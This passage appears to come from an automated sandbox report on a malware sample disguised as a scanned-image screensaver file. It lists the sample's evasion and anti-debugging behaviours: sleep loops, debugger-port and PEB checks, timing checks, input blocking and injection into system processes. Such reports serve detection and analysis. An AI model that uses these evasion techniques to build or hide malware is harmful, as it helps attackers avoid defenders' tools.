                Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-95967
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe API/Special instruction interceptor: Address: 1573774
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416628 rdtsc 1_2_00416628
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe API coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\verclsid.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\verclsid.exe TID: 7724 Thread sleep count: 48 > 30
                Source: C:\Windows\SysWOW64\verclsid.exe TID: 7724 Thread sleep time: -96000s >= -30000s
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904 Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904 Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904 Thread sleep time: -34000s >= -30000s
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904 Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\verclsid.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\verclsid.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C68EE FindFirstFileW,FindClose,0_2_004C68EE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_004C698F
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004BD076
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004BD3A9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C9642
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C979D
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_004C9B2B
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_004BDBBE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_004C5C97
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0303C650 FindFirstFileW,FindNextFileW,FindClose,3_2_0303C650
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE
                Source: zalkpCfMwtnpQo.exe, 00000007.00000002.3548850540.000000000149F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                Source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2127771986.000001110FEAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\verclsid.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416628 rdtsc 1_2_00416628
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417733 LdrLoadDll,1_2_00417733
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004CEAA2 BlockInput,0_2_004CEAA2
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00482622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00482622
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00474CE8 mov eax, dword ptr fs:[00000030h] 0_2_00474CE8
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_015723D0 mov eax, dword ptr fs:[00000030h] 0_2_015723D0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_015739E0 mov eax, dword ptr fs:[00000030h] 0_2_015739E0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_01573A40 mov eax, dword ptr fs:[00000030h] 0_2_01573A40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h] 1_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h] 1_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h] 1_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h] 1_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h] 1_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h] 1_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395438F mov eax, dword ptr fs:[00000030h] 1_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395438F mov eax, dword ptr fs:[00000030h] 1_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h] 1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h] 1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h] 1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h] 1_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h] 1_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h] 1_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h] 1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h] 1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h] 1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h] 1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h] 1_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039663FF mov eax, dword ptr fs:[00000030h] 1_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h] 1_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h] 1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A08324 mov ecx, dword ptr fs:[00000030h] 1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h] 1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h] 1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h] 1_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h] 1_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h] 1_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h] 1_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] 1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] 1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] 1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h] 1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] 1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] 1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h] 1_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D8350 mov ecx, dword ptr fs:[00000030h] 1_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D437C mov eax, dword ptr fs:[00000030h] 1_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A0634F mov eax, dword ptr fs:[00000030h] 1_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h] 1_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h] 1_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h] 1_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h] 1_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h] 1_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h] 1_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h] 1_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] 1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] 1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] 1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] 1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] 1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h] 1_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h] 1_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h] 1_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A062D6 mov eax, dword ptr fs:[00000030h] 1_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392823B mov eax, dword ptr fs:[00000030h] 1_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h] 1_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03936259 mov eax, dword ptr fs:[00000030h] 1_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h] 1_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h] 1_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h] 1_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h] 1_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h] 1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h] 1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]1_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0625D mov eax, dword ptr fs:[00000030h]1_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]1_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]1_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]1_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]1_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]1_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]1_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]1_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
